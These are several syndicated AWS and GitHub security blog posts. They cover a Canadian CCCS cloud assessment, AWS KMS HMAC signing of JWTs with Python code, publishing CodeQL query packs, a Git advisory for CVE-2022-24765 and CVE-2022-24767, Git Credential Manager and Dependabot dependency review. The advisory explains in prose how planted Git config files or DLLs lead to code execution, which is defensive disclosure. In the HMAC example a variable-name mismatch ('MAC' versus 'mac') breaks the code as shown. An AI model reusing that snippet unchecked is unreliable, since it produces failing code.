Brian Mycroft is a Chief Technologist at AWS, based in Ottawa (Canada), specializing in national security, intelligence, and the Canadian federal government. Brian is the lead architect of the AWS Secure Environment Accelerator (ASEA) and focuses on removing public sector barriers to cloud adoption.

.


 

Rapport sommaire de l’évaluation du Centre canadien pour la cybersécurité disponible sur AWS Artifact

Par Robert Samuel, Naranjan Goklani et Brian Mycroft
Amazon Web Services (AWS) s’engage à fournir à ses clients une assurance continue à travers des évaluations, des certifications et des attestations qui appuient l’adoption des services proposés par AWS. Nous avons le plaisir d’annoncer la mise à disposition du rapport sommaire de l’évaluation du Centre canadien pour la cybersécurité (CCCS) pour AWS, que vous pouvez dès à présent consulter et télécharger à la demande sur AWS Artifact.

Le CCC est l’autorité canadienne qui met son expertise en matière de cybersécurité au service du gouvernement canadien, du secteur privé et du grand public. Les organisations des secteurs public et privé établies au Canada dépendent de la rigoureuse évaluation de la sécurité des technologies de l’information s’appliquant aux fournisseurs de services infonuagiques conduite par le CCC pour leur décision relative à l’utilisation de ces services infonuagiques. De plus, le processus d’évaluation de la sécurité des technologies de l’information est une étape obligatoire pour permettre à AWS de fournir des services infonuagiques aux agences et aux ministères du gouvernement fédéral canadien.

Le Processus d’évaluation de la sécurité des technologies de l’information s’appliquant aux fournisseurs de services infonuagiques détermine si les exigences en matière de technologie de l’information du Gouvernement du Canada (GC) pour le profil de contrôle de la sécurité infonuagique moyen (précédemment connu sous le nom de Protégé B/Intégrité moyenne/Disponibilité moyenne) sont satisfaites conformément à l’ITSG-33 (Gestion des risques liés à la sécurité des TI : Une méthode axée sur le cycle de vie, Annexe 3 – Catalogue des contrôles de sécurité). En date de septembre 2021, 120 services AWS de la région (centrale) du Canada ont été évalués par le CCC et satisfont aux exigences du profil de sécurité moyen du nuage. Satisfaire les exigences du niveau moyen du nuage est nécessaire pour héberger des applications classées jusqu’à la catégorie moyenne incluse. Le CCC évalue périodiquement les nouveaux services, ou les services qui n’ont pas encore été évalués, et réévalue les services AWS précédemment évalués pour s’assurer qu’ils continuent de satisfaire aux exigences du Gouvernement du Canada. Le CCC priorise l’évaluation des nouveaux services AWS selon leur disponibilité au Canada et en fonction de la demande des clients pour les services AWS. La liste complète des services AWS évalués par le CCC est consultable sur notre page Services AWS concernés par le programme de conformité.

Pour en savoir plus sur l’évaluation du CCC ainsi que sur nos autres programmes de conformité et de sécurité, visitez la page Programmes de conformité AWS. Comme toujours, nous accordons beaucoup de valeur à vos commentaires et à vos questions; vous pouvez communiquer avec l’équipe Conformité AWS via la page Communiquer avec nous.

Si vous avez des commentaires sur cette publication, n’hésitez pas à les partager dans la section Commentaires ci-dessous. Vous souhaitez en savoir plus sur AWS Security? Retrouvez-nous sur Twitter.

Biographies des auteurs :

Rob Samuel : Rob Samuel est responsable technique principal d’AWS Security Assurance. Il collabore avec les équipes AWS pour traduire les principes de protection des données en recommandations techniques, aligne la direction technique et les priorités, met en œuvre les nouvelles solutions techniques, aide à intégrer les solutions de sécurité et de confidentialité aux services et fonctionnalités proposés par AWS et répond aux exigences et aux attentes en matière de confidentialité et de sécurité transversale. Rob a plus de 20 ans d’expérience dans le secteur de la technologie et a déjà occupé des fonctions dirigeantes, comme directeur de l’assurance sécurité pour AWS Canada, responsable de la cybersécurité et des systèmes d’information (RSSI) pour la province de la Nouvelle-Écosse, divers postes à responsabilités en tant que fonctionnaire et a servi dans les Forces armées canadiennes en tant qu’officier du génie électronique et des communications.

Naranjan Goklani : Naranjan Goklani est responsable des audits de sécurité pour AWS, il est basé à Toronto (Canada). Il est responsable des audits, des attestations, des certifications et des évaluations pour l’Amérique du Nord et l’Europe. Naranjan a plus de 12 ans d’expérience dans la gestion des risques, l’assurance de la sécurité et la réalisation d’audits de technologie. Naranjan a exercé dans l’une des quatre plus grandes sociétés de comptabilité et accompagné des clients des industries de la distribution, du commerce en ligne et des services publics.

Brian Mycroft : Brian Mycroft est technologue en chef pour AWS, il est basé à Ottawa (Canada) et se spécialise dans la sécurité nationale, le renseignement et le gouvernement fédéral du Canada. Brian est l’architecte principal de l’AWS Secure Environment Accelerator (ASEA) et s’intéresse principalement à la suppression des barrières à l’adoption du nuage pour le secteur public.

How to protect HMACs inside AWS KMS

Post Syndicated from Jeremy Stieglitz original https://aws.amazon.com/blogs/security/how-to-protect-hmacs-inside-aws-kms/

Today AWS Key Management Service (AWS KMS) is introducing new APIs to generate and verify hash-based message authentication codes (HMACs) using the Federal Information Processing Standard (FIPS) 140-2 validated hardware security modules (HSMs) in AWS KMS. HMACs are a powerful cryptographic building block that incorporate secret key material in a hash function to create a unique, keyed message authentication code.

In this post, you will learn the basics of the HMAC algorithm as a cryptographic building block, including how HMACs are used. In the second part of this post, you will see a few real-world use cases that show an application builder’s perspective on using the AWS KMS HMAC APIs.

HMACs provide a fast way to tokenize or sign data such as web API requests, credit cards, bank routing information, or personally identifiable information (PII).They are commonly used in several internet standards and communication protocols such as JSON Web Tokens (JWT), and are even an important security component for how you sign AWS API requests.

HMAC as a cryptographic building block

You can consider an HMAC, sometimes referred to as a keyed hash, to be a combination function that fuses the following elements:

  • A standard hash function such as SHA-256 to produce a message authentication code (MAC).
  • A secret key that binds this MAC to that key’s unique value.

Combining these two elements creates a unique, authenticated version of the digest of a message. Because the HMAC construction allows interchangeable hash functions as well as different secret key sizes, one of the benefits of HMACs is the easy replaceability of the underlying hash function (in case faster or more secure hash functions are required), as well as the ability to add more security by lengthening the size of the secret key used in the HMAC over time. The AWS KMS HMAC API is launching with support for SHA-224, SHA-256, SHA-384, and SHA-512 algorithms to provide a good balance of key sizes and performance trade-offs in the implementation. For more information about HMAC algorithms supported by AWS KMS, see HMAC keys in AWS KMS in the AWS KMS Developer Guide.

HMACs offer two distinct benefits:

  1. Message integrity: As with all hash functions, the output of an HMAC will result in precisely one unique digest of the message’s content. If there is any change to the data object (for example you modify the purchase price in a contract by just one digit: from “$350,000” to “$950,000”), then the verification of the original digest will fail.
  2. Message authenticity: What distinguishes HMAC from other hash methods is the use of a secret key to provide message authenticity. Only message hashes that were created with the specific secret key material will produce the same HMAC output. This dependence on secret key material ensures that no third party can substitute their own message content and create a valid HMAC without the intended verifier detecting the change.

HMAC in the real world

HMACs have widespread applications and industry adoption because they are fast, high performance, and simple to use. HMACs are particularly popular in the JSON Web Token (JWT) open standard as a means of securing web applications, and have replaced older technologies such as cookies and sessions. In fact, Amazon implements a custom authentication scheme, Signature Version 4 (SigV4), to sign AWS API requests based on a keyed-HMAC. To authenticate a request, you first concatenate selected elements of the request to form a string. You then use your AWS secret key material to calculate the HMAC of that string. Informally, this process is called signing the request, and the output of the HMAC algorithm is informally known as the signature, because it simulates the security properties of a real signature in that it represents your identity and your intent.

Advantages of using HMACs in AWS KMS

AWS KMS HMAC APIs provide several advantages over implementing HMACs in application software because the key material for the HMACs is generated in AWS KMS hardware security modules (HSMs) that are certified under the FIPS 140-2 program and never leave AWS KMS unencrypted. In addition, the HMAC keys in AWS KMS can be managed with the same access control mechanisms and auditing features that AWS KMS provides on all AWS KMS keys. These security controls ensure that any HMAC created in AWS KMS can only ever be verified in AWS KMS using the same KMS key. Lastly, the HMAC keys and the HMAC algorithms that AWS KMS uses conform to industry standards defined in RFC 2104 HMAC: Keyed-Hashing for Message Authentication.

Use HMAC keys in AWS KMS to create JSON Web Tokens

The JSON Web Token (JWT) open standard is a common use of HMAC. The standard defines a portable and secure means to communicate a set of statements, known as claims, between parties. HMAC is useful for applications that need an authorization mechanism, in which claims are validated to determine whether an identity has permission to perform some action. Such an application can only work if a validator can trust the integrity of claims in a JWT. Signing JWTs with an HMAC is one way to assert their integrity. Verifiers with access to an HMAC key can cryptographically assert that the claims and signature of a JWT were produced by an issuer using the same key.

This section will walk you through an example of how you can use HMAC keys from AWS KMS to sign JWTs. The example uses the AWS SDK for Python (Boto3) and implements simple JWT encoding and decoding operations. This example shows the ease with which you can integrate HMAC keys in AWS KMS into your JWT application, even if your application is in another language or uses a more formal JWT library.

Create an HMAC key in AWS KMS

Begin by creating an HMAC key in AWS KMS. You can use the AWS KMS console or call the CreateKey API action. The following example shows creation of a 256-bit HMAC key:

import boto3

kms = boto3.client('kms')

# Use CreateKey API to create a 256-bit key for HMAC
key_id = kms.create_key(
	KeySpec='HMAC_256',
	KeyUsage='GENERATE_VERIFY_MAC'
)['KeyMetadata']['KeyId']

Use the HMAC key to encode a signed JWT

Next, you use the HMAC key to encode a signed JWT. There are three components to a JWT token: the set of claims, header, and signature. The claims are the very application-specific statements to be authenticated. The header describes how the JWT is signed. Lastly, the MAC (signature) is the output of applying the header’s described operation to the message (the combination of the claims and header). All these are packed into a URL-safe string according to the JWT standard.

The following example uses the previously created HMAC key in AWS KMS within the construction of a JWT. The example’s claims simply consist of a small claim and an issuance timestamp. The header contains key ID of the HMAC key and the name of the HMAC algorithm used. Note that HS256 is the JWT convention used to represent HMAC with SHA-256 digest. You can generate the MAC using the new GenerateMac API action in AWS KMS.

import base64
import json
import time

def base64_url_encode(data):
	return base64.b64encode(data, b'-_').rstrip(b'=')

# Payload contains simple claim and an issuance timestamp
payload = json.dumps({
	"does_kms_support_hmac": "yes",
	"iat": int(time.time())
}).encode("utf8")

# Header describes the algorithm and AWS KMS key ID to be used for signing
header = json.dumps({
	"typ": "JWT",
	"alg": "HS256",
	"kid": key_id #This key_id is from the “Create an HMAC key in AWS KMS” #example. The “Verify the signed JWT” example will later #assert that the input header has the same value of the #key_id 
}).encode("utf8")

# Message to sign is of form <header_b64>.<payload_b64>
message = base64_url_encode(header) + b'.' + base64_url_encode(payload)

# Generate MAC using GenerateMac API of AWS KMS
MAC = kms.generate_mac(
	KeyId=key_id, #This key_id is from the “Create an HMAC key in AWS KMS” 
				 #example
	MacAlgorithm='HMAC_SHA_256',
	Message=message
)['Mac']

# Form JWT token of form <header_b64>.<payload_b64>.<mac_b64>
jwt_token = message + b'.' + base64_url_encode(mac)

Verify the signed JWT

Now that you have a signed JWT, you can verify it using the same KMS HMAC key. The example below uses the new VerifyMac API action to validate the MAC (signature) of the JWT. If the MAC is invalid, AWS KMS returns an error response and the AWS SDK throws an exception. If the MAC is valid, the request succeeds and the application can continue to do further processing on the token and its claims.

def base64_url_decode(data):
	return base64.b64decode(data + b'=' * (4 - len(data) % 4), b'-_')

# Parse out encoded header, payload, and MAC from the token
message, mac_b64 = jwt_token.rsplit(b'.', 1)
header_b64, payload_b64 = message.rsplit(b'.', 1)

# Decode header and verify its contents match expectations
header_map = json.loads(base64_url_decode(header_b64).decode("utf8"))
assert header_map == {
	"typ": "JWT",
	"alg": "HS256",
	"kid": key_id #This key_id is from the “Create an HMAC key in AWS KMS” 
				 #example
}

# Verify the MAC using VerifyMac API of AWS KMS. # If the verification fails, this will throw an error.
kms.verify_mac(
	KeyId=key_id, #This key_id is from the “Create an HMAC key in AWS KMS” 
				 #example
	MacAlgorithm='HMAC_SHA_256',
	Message=message,
	Mac=base64_url_decode(mac_b64)
)

# Decode payload for use application-specific validation/processing
payload_map = json.loads(base64_url_decode(payload_b64).decode("utf8"))

Create separate roles to control who has access to generate HMACs and who has access to validate HMACs

It’s often helpful to have separate JWT creators and validators so that you can distinguish between the roles that are allowed to create tokens and the roles that are allowed to verify tokens. HMAC signatures performed outside of AWS-KMS don’t work well for this because you can’t isolate creators and verifiers if they both must have a copy of the same key. However, this is not an issue for HMAC keys in AWS KMS. You can use key policies to separate out who has permission to ask AWS KMS to generate HMACs and who has permission to ask AWS KMS to validate. Each party uses their own unique access keys to access the HMAC key in AWS KMS. Only HSMs in AWS KMS will ever have access to the actual key material. See the following example key policy statements that separate out GenerateMac and VerifyMac permissions:

{
	"Id": "example-jwt-policy",
	"Version": "2012-10-17",
	"Statement": [
		{
			"Sid": "Allow use of the key for creating JWTs",
			"Effect": "Allow",
			"Principal": {
				"AWS": "arn:aws:iam::111122223333:role/JwtProducer"
			},
			"Action": [
				"kms:GenerateMac"
			],
			"Resource": "*"
		},
		{
			"Sid": "Allow use of the key for validating JWTs",
			"Effect": "Allow",
			"Principal": {
				"AWS": "arn:aws:iam::111122223333:role/JwtConsumer"
			},
			"Action": [
				"kms:VerifyMac"
			],
			"Resource": "*"
		}
	]
}

Conclusion

In this post, you learned about the new HMAC APIs in AWS KMS (GenerateMac and VerifyMac). These APIs complement existing AWS KMS cryptographic operations: symmetric key encryption, asymmetric key encryption and signing, and data key creation and key enveloping. You can use HMACs for JWTs, tokenization, URL and API signing, as a key derivation function (KDF), as well as in new designs that we haven’t even thought of yet. To learn more about HMAC functionality and design, see HMAC keys in AWS KMS in the AWS KMS Developer Guide.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the KMS re:Post or contact AWS Support.
Want more AWS Security news? Follow us on Twitter.

Author

Jeremy Stieglitz

Jeremy is the Principal Product Manager for AWS Key Management Service (KMS) where he drives global product strategy and roadmap for AWS KMS. Jeremy has more than 20 years of experience defining new products and platforms, launching and scaling cryptography solutions, and driving end-to-end product strategies. Jeremy is the author or co-author of 23 patents in network security, user authentication and network automation and control.

Author

Peter Zieske

Peter is a Senior Software Developer on the AWS Key Management Service team, where he works on developing features on the service-side front-end. Outside of work, he enjoys building with LEGO, gaming, and spending time with family.

Sharing security expertise through CodeQL packs (Part I)

Post Syndicated from Andrew Eisenberg original https://github.blog/2022-04-19-sharing-security-expertise-through-codeql-packs-part-i/

Congratulations! You’ve discovered a security bug in your own code before anyone has exploited it. It’s a big relief. You’ve created a CodeQL query to find other places where this happens and ensure this will never happen again, and you’ve deployed your new query to be run on every pull request in your repo to prevent similar mistakes from ever being made again.

What’s the best way to share this knowledge with the community to help protect the open source ecosystem by making sure that the same vulnerability is never introduced into anyone’s codebase, ever?

The short answer: produce a CodeQL pack containing your queries, and publish them to GitHub. CodeQL packaging is a beta feature in the CodeQL ecosystem. With CodeQL packaging, your expertise is documented, concise, executable, and easily shareable.

This is the first post of a two-part series on CodeQL packaging. In this post, we show how to use CodeQL packs to share security expertise. In the next post, we will discuss some of our implementation and design decisions.

Modeling a vulnerability in CodeQL

CodeQL’s customizability makes it great for detecting vulnerabilities in your code. Let’s use the Exec call vulnerable to binary planting query as an example. This query was developed by our team in response to discovering a real vulnerability in one of our open source repositories.

The purpose of this query is to detect executables that are potentially vulnerable to Windows binary planting, an exploit where an attacker could inject a malicious executable into a pull request. This query is meant to be evaluated on JavaScript code that is run inside of a GitHub Action. It matches all arguments to calls to the ToolRunner (a GitHub Action API) where the argument has not been sanitized (that is, ensured to be safe) by having been wrapped in a call to safeWhich. The implementation details of this query are not relevant to this post, but you can explore this query and other domain-specific queries like it in the repository.

This query is currently protecting us on every pull request, but in its current form, it is not easily available for others to use. Even though this vulnerability is relatively difficult to attack, the surface area is large, and it could affect any GitHub Action running on Windows in public repositories that accept pull requests. You could write a stern blog post on the dangers of invoking unqualified Windows executables in untrusted pull requests (maybe you’re even reading such a post right now!), but your impact will be much higher if you could share the query to help anyone find the bug in their code. This is where CodeQL packaging comes in. Using CodeQL packaging, not only can developers easily learn about the binary planting pattern, but they can also automatically apply the pattern to find the bug in their own code.

Sharing queries through CodeQL packs

If you think that your query is general purpose and applicable to all repositories in all situations, then it is best to contribute it to our open source CodeQL query repository (and collect a bounty in the process!). That way, your query will be run on every pull request on every repository that has GitHub code scanning enabled.

However, many (if not most) queries are domain specific and not applicable to all repositories. For example, this particular binary planting query is only applicable to GitHub Actions implemented in JavaScript. The best way to share such queries query is by creating a CodeQL pack and publishing it to the CodeQL package registry to make it available to the world. Once published, CodeQL packs are easily shared with others and executed in their CI/CD pipeline.

There are two kinds of CodeQL packs:

  • Query packs, which contain a set of pre-compiled queries that can be easily evaluated on a CodeQL database.
  • Library packs, which contain CodeQL libraries (*.qll files), but do not contain any runnable queries. Library packs are meant to be used as building blocks to produce other query packs or library packs.

In the rest of this post, we will show you how to create, share, and consume a CodeQL query pack. Library packs will be introduced in a future blog post.

To create a CodeQL pack, you’ll need to make sure that you’ve installed and set up the CodeQL CLI. You can follow the instructions here.

The next step is to create a qlpack.yml file. This file declares the CodeQL pack and information about it. Any *.ql files in the same directory (or sub-directory) as a qlpack.yml file are considered part of the package. In this case, you can place binary-planting.ql next to the qlpack.yml file.

Here is the qlpack.yml from our example:

name: aeisenberg/codeql-actions-queries
version: 1.0.1
dependencies:
 codeql/javascript-all: ~0.0.10

All CodeQL packs must have a name property. If they are going to be published to the CodeQL registry, then they must have a scope as part of the name. The scope is the part of the package name before the slash (in this example: aeisenberg). It should be the username or organization on github.com that will own this package. Anyone publishing a package must have the proper privileges to do so for that scope. The name part of the package name must be unique within the scope. Additionally, a version, following standard semver rules, is required for publishing.

The dependencies block lists all of the dependencies of this package and their compatible version ranges. Each dependency is referenced as the scope/name of a CodeQL library pack, and each library pack may in turn depend on other library packs declared in their qlpack.yml files. Each query pack must (transitively) depend on exactly one of the core language packs (for example, JavaScript, C#, Ruby, etc.), which determines the language your query can analyze.

In this query pack, the standard JavaScript libraries, codeql/javascript-all, is the only dependency and the semver range ~0.0.10 means any version >= 0.0.10 and < 0.1.0 suffices.

With the qlpack.yml defined, you can now install all of your declared dependencies. Run the codeql pack install command in the root directory of the CodeQL pack:

$ codeql pack install
Dependencies resolved. Installing packages...
Install location: /Users/andrew.eisenberg/.codeql/packages
Installed fresh codeql/[email protected]

After making any changes to the query, you can then publish the query to the GitHub registry. You do this by running the codeql pack publish command in the root of the CodeQL pack.

Here is the output of the command:

$ codeql pack publish
Running on packs: aeisenberg/codeql-actions-queries.
Bundling and then publishing qlpack located at '/Users/andrew.eisenberg/git-repos/codeql-actions-queries'.
Bundled qlpack created at '/var/folders/41/kxmfbgxj40dd2l_x63x9fw7c0000gn/T/codeql-docker17755193287422157173/.Docker Package Manager/codeql-actions-queries.1.0.1.tgz'.
Packaging> Package 'aeisenberg/codeql-actions-queries' will be published to registry 'https://ghcr.io/v2/' as 'aeisenberg/codeql-actions-queries'.
Packaging> Package 'aeisenberg/[email protected]' will be published locally to /Users/andrew.eisenberg/.codeql/packages/aeisenberg/codeql-actions-queries/1.0.1
Publish successful.

You have successfully published your first CodeQL pack! It is now available in the registry on GitHub.com for anyone else to run using the CodeQL CLI. You can view your newly-published package on github.com:

CodeQL pack on github.com

At the time of this writing, packages are initially uploaded as private packages. If you want to make it public, you must explicitly change the permissions. To do this, go to the package page, click on package settings, then scroll down to the Danger Zone:

Danger Zone!

And click Change visibility.

Running queries from CodeQL packs using the CodeQL CLI

Running the queries in a CodeQL pack is simple using the CodeQL CLI. If you already have a database created, just call the codeql database analyze command with the --download option, passing a reference to the package you want to use in your analysis:

$ codeql database analyze --format=sarif-latest --output=out.sarif --download my-db aeisenberg/[email protected]^1.0.1

The --download option asks CodeQL to download any CodeQL packs that aren’t already available. The ^1.0,0 is optional and specifies that you want to run the latest version of the package that is compatible with ^1.0.1. If no version range is specified, then the latest version is always used. You can also pass a list of packages to evaluate. The CodeQL CLI will download and cache each specified package and then run all queries in their default query suite.

To run a subset of queries in a pack, add a : and a path after it:

aeisenberg/[email protected]^1.0.1:binary-planting.ql

Everything after the : is interpreted as a path relative to the root of the pack, and you can specify a single query, a query directory, or a query suite (.qls file).

Evaluating CodeQL packs from code scanning

Run the queries from your CodeQL pack in GitHub code scanning is easy! In your code scanning workflow, in the github/codeql-action/init step, add packs entry to list the packs you want to run:

- uses: github/codeql-action/[email protected]
  with:
    packs:
      - aeisenberg/[email protected]
    languages: javascript

Note that specifying a path after a colon is not yet supported in the codeql-action, so using this approach, you can only run the default query suite of a pack in this manner.

Conclusion

We’ve shown how easy it is to share your CodeQL queries with the world using two CLI commands: the first resolves and retrieves your dependencies and the second compiles, bundles, and publishes your package.

To recap:

Publishing a CodeQL query pack consists of:

  1. Create the qlpack.yml file.
  2. Run codeql pack install to download dependencies.
  3. Write and test your queries.
  4. Run codeql pack publish to share your package in GHCR.

Using a CodeQL query pack from GHCR on the command line consists of:

  1. codeql database analyze --download path/to/my-db aeisenberg/[email protected]

Using a CodeQL query pack from GHCR in code-scanning consists of:

  1. Adding a config-file input to the github/codeql-action/init action
  2. Adding a packs block in the config file

The CodeQL Team has already published all of our standard queries as query packs, and all of our core libraries as library packs. Any pack named {*}-queries is a query pack and contains queries that can be used to scan your code. Any pack named {*}-all is a library pack and contains CodeQL libraries (*.qll files) that can be used as the building blocks for your queries. When you are creating your own query packs, you should be adding as a dependency the library pack for the language that your query will scan.

If you are interested in understanding more about how we’ve implemented packaging and some of our design decisions, please check out our second post in this series. Also, if you are interested in learning more or contributing to CodeQL, get involved with the Security Lab.

Sharing your security expertise has never been easier!

Git security vulnerability announced

Post Syndicated from Taylor Blau original https://github.blog/2022-04-12-git-security-vulnerability-announced/

Today, the Git project released new versions which address a pair of security vulnerabilities.

GitHub is unaffected by these vulnerabilities1. However, you should be aware of them and upgrade your local installation of Git, especially if you are using Git for Windows, or you use Git on a multi-user machine.

CVE-2022-24765

This vulnerability affects users working on multi-user machines where a malicious actor could create a .git directory in a shared location above a victim’s current working directory. On Windows, for example, an attacker could create C:\.git\config, which would cause all git invocations that occur outside of a repository to read its configured values.

Since some configuration variables (such as core.fsmonitor) cause Git to execute arbitrary commands, this can lead to arbitrary command
execution when working on a shared machine.

The most effective way to protect against this vulnerability is to upgrade to Git v2.35.2. This version changes Git’s behavior when looking for a top-level .git directory to stop when its directory traversal changes ownership from the current user. (If you wish to make an exception to this behavior, you can use the new multi-valued safe.directory configuration).

If you can’t upgrade immediately, the most effective ways to reduce your risk are the following:

  • Define the GIT_CEILING_DIRECTORIES environment variable to contain the parent directory of your user profile (i.e., /Users on macOS,
    /home on Linux, and C:\Users on Windows).
  • Avoid running Git on multi-user machines when your current working directory is not within a trusted repository.

Note that many tools (such as the Git for Windows installation of Git Bash, posh-git, and Visual Studio) run Git commands under the hood. If you are on a multi-user machine, avoid using these tools until you have upgraded to the latest release.

Credit for finding this vulnerability goes to 俞晨东.

[source]

CVE-2022-24767

This vulnerability affects the Git for Windows uninstaller, which runs in the user’s temporary directory. Because the SYSTEM user account inherits the
default permissions of C:\Windows\Temp (which is world-writable), any authenticated user can place malicious .dll files which are loaded when
running the Git for Windows uninstaller when run via the SYSTEM account.

The most effective way to protect against this vulnerability is to upgrade to Git for Windows v2.35.2. If you can’t upgrade
immediately, reduce your risk with the following:

  • Avoid running the uninstaller until after upgrading
  • Override the SYSTEM user’s TMP environment variable to a directory which can only be written to by the SYSTEM user
  • Remove unknown .dll files from C:\Windows\Temp before running the
    uninstaller
  • Run the uninstaller under an administrator account rather than as the
    SYSTEM user

Credit for finding this vulnerability goes to the Lockheed Martin Red Team.

[source]

Download Git 2.35.2


  1. GitHub does not run git outside of known repositories, so is not susceptible to the attack described by CVE-2022-24765. Likewise, GitHub does not use Git for Windows, and so is unaffected by CVE-2022-24767 entirely. 

Git Credential Manager: authentication for everyone

Post Syndicated from Matthew John Cheetham original https://github.blog/2022-04-07-git-credential-manager-authentication-for-everyone/

Universal Git Authentication

“Authentication is hard. Hard to debug, hard to test, hard to get right.” – Me

These words were true when I wrote them back in July 2020, and they’re still true today. The goal of Git Credential Manager (GCM) is to make the task of authenticating to your remote Git repositories easy and secure, no matter where your code is stored or how you choose to work. In short, GCM wants to be Git’s universal authentication experience.

In my last blog post, I talked about the risk of proliferating “universal standards” and how introducing Git Credential Manager Core (GCM Core) would mean yet another credential helper in the wild. I’m therefore pleased to say that we’ve managed to successfully replace both GCM for Windows and GCM for Mac and Linux with the new GCM! The source code of the older projects has been archived, and they are no longer shipped with distributions like Git for Windows!

In order to celebrate and reflect this successful unification, we decided to drop the “Core” moniker from the project’s name to become simply Git Credential Manager or GCM for short.

Git Credential Manager

If you have followed the development of GCM closely, you might have also noticed we have a new home on GitHub in our own organization, github.com/GitCredentialManager!

We felt being homed under github.com/microsoft or github.com/github didn’t quite represent the ethos of GCM as an open, universal and agnostic project. All existing issues and pull requests were migrated, and we continue to welcome everyone to contribute to the project.

GCM Home

Interacting with HTTP remotes without the help of a credential helper like GCM is becoming more difficult with the removal of username/password authentication at GitHub and Bitbucket. Using GCM makes it easy, and with exciting developments such as using GitHub Mobile for two-factor authentication and OAuth device code flow support, we are making authentication more seamless.

Hello, Linux!

In the quest to become a universal solution for Git authentication, we’ve worked hard on getting GCM to work well on various Linux distributions, with a primary focus on Debian-based distributions.

Today we have Debian packages available to download from our GitHub releases page, as well as tarballs for other distributions (64-bit Intel only). Being built on the .NET platform means there should be a reduced effort to build and run anywhere the .NET runtime runs. Over time, we hope to expand our support matrix of distributions and CPU architectures (by adding ARM64 support, for example).

Due to the broad and varied nature of Linux distributions, it’s important that GCM offers many different credential storage options. In addition to GPG encrypted files, we added support for the Secret Service API via libsecret (also see the GNOME Keyring), which provides a similar experience to what we provide today in GCM on Windows and macOS.

Windows Subsystem for Linux

In addition to Linux distributions, we also have special support for using GCM with Windows Subsystem for Linux (WSL). Using GCM with WSL means that all your WSL installations can share Git credentials with each other and the Windows host, enabling you to easily mix and match your development environments.

Easily mix and match your development environments

You can read more about using GCM inside of your WSL installations here.

Hello, GitLab

Being universal doesn’t just mean we want to run in more places, but also that we can help more users with whatever Git hosting service they choose to use. We are very lucky to have such an engaged community that is constantly working to make GCM better for everyone.

On that note, I am thrilled to share that through a community contribution, GCM now has support for GitLab.  Welcome to the family!

GCM for everyone

Look Ma, no terminals!

We love the terminal and so does GCM. However, we know that not everyone feels comfortable typing in commands and responding to prompts via the keyboard. Also, many popular tools and IDEs that offer Git integration do so by shelling out to the git executable, which means GCM may be called upon to perform authentication from a GUI app where there is no terminal(!)

GCM has always offered full graphical authentication prompts on Windows, but thanks to our adoption of the Avalonia project that provides a cross-platform .NET XAML framework, we can now present graphical prompts on macOS and Linux.

GCM continues to support terminal prompts as a first-class option for all prompts.

GCM continues to support terminal prompts as a first-class option for all prompts. We detect environments where there is no GUI (such as when connected over SSH without display forwarding) and instead present the equivalent text-based prompts. You can also manually disable the GUI prompts if you wish.

Securing the software supply chain

Keeping your source code secure is a critical step in maintaining trust in software, whether that be keeping commercially sensitive source code away from prying eyes or protecting against malicious actors making changes in both closed and open source projects that underpin much of the modern world.

In 2020, an extensive cyberattack was exposed that impacted parts of the US federal government as well as several major software companies. The US president’s recent executive order in response to this cyberattack brings into focus the importance of mechanisms such as multi-factor authentication, conditional access policies, and generally securing the software supply chain.

Store ALL the credentials

Git Credential Manager creates and stores credentials to access Git repositories on a host of platforms. We hold in the highest regard the need to keep your credentials and access secure. That’s why we always keep your credentials stored using industry standard encryption and storage APIs.

GCM makes use of the Windows Credential Manager on Windows and the login keychain on macOS.

In addition to these existing mechanisms, we also support several alternatives across supported platforms, giving you the choice of how and where you wish to store your generated credentials (such as GPG-encrypted credential files).

Store all your credentials

GCM can now also use Git’s git-credential-cache helper that is commonly built and available in many Git distributions. This is a great option for cloud shells or ephemeral environments when you don’t want to persist credentials permanently to disk but still want to avoid a prompt for every git fetch or git push.

Modern windows authentication (experimental)

Another way to keep your credentials safe at rest is with hardware-level support through technologies like the Trusted Platform Module (TPM) or Secure Enclave. Additionally, enterprises wishing to make sure your device or credentials have not been compromised may want to enforce conditional access policies.

Integrating with these kinds of security modules or enforcing policies can be tricky and is platform-dependent. It’s often easier for applications to hand over responsibility for the credential acquisition, storage, and policy
enforcement to an authentication broker.

An authentication broker performs credential negotiation on behalf of an app, simplifying many of these problems, and often comes with the added benefit of deeper integration with operating system features such as biometrics.

Authentication broker diagram

I’m happy to announce that GCM has gained experimental support for brokered authentication (Windows-only at the moment)!

On Windows, the authentication broker is a component that was first introduced in Windows 10 and is known as the Web Account Manager (WAM). WAM enables apps like GCM to support modern authentication experiences such as Windows Hello and will apply conditional access policies set by your work or school.

Please note that support for the Windows broker is currently experimental and limited to authentication of Microsoft work and school accounts against Azure DevOps.

Click here to read more about GCM and WAM, including how to opt-in and current known issues.

Even more improvements

GCM has been a hive of activity in the past 18 months, with too many new features and improvements to talk about in detail! Here’s a quick rundown of additional updates since our July 2020 post:

  • Automatic on-premises/self-hosted instance detection
  • GitHub Enterprise Server and GitHub AE support
  • Shared Microsoft Identity token caches with other developer tools
  • Improved network proxy support
  • Custom TLS/SSL root certificate support
  • Admin-less Windows installer
  • Improved command line handling and output
  • Enterprise default setting support on Windows
  • Multi-user support
  • Better diagnostics

Thank you!

The GCM team would also like to personally thank all the people who have made contributions, both large and small, to the project:

@vtbassmatt, @kyle-rader, @mminns, @ldennington, @hickford, @vdye, @AlexanderLanin, @derrickstolee, @NN, @johnemau, @karlhorky, @garvit-joshi, @jeschu1, @WormJim, @nimatt, @parasychic, @cjsimon, @czipperz, @jamill, @jessehouwing, @shegox, @dscho, @dmodena, @geirivarjerstad, @jrbriggs, @Molkree, @4brunu, @julescubtree, @kzu, @sivaraam, @mastercoms, @nightowlengineer

Future work

While we’ve made a great deal of progress toward our universal experience goal, we’re not slowing down anytime soon; we’re still full steam ahead with GCM!

Our focus for the next period will be on iterating and improving our authentication broker support, providing stronger protection of credentials, and looking to increase performance and compatibility with more environments and uses.

Prevent the introduction of known vulnerabilities into your code

Post Syndicated from Courtney Claessens original https://github.blog/2022-04-06-prevent-introduction-known-vulnerabilities-into-your-code/

Understanding your supply chain is critical to maintaining the security of your software. Dependabot already alerts you when vulnerabilities are found in your existing dependencies, but what if you add a new dependency with a vulnerability? With the dependency review action, you can proactively block pull requests that introduce dependencies with known vulnerabilities.

How it works

The GitHub Action automates finding and blocking vulnerabilities that are currently only displayed in the rich diff of a pull request. When you add the dependency review action to your repository, it will scan your pull requests for dependency changes. Then, it will check the GitHub Advisory Database to see if any of the new dependencies have existing vulnerabilities. If they do, the action will raise an error so that you can see which dependency has a vulnerability and implement the fix with the contextual intelligence provided. The action is supported by a new API endpoint that diffs the dependencies between any two revisions.

Demo of dependency review enforcement
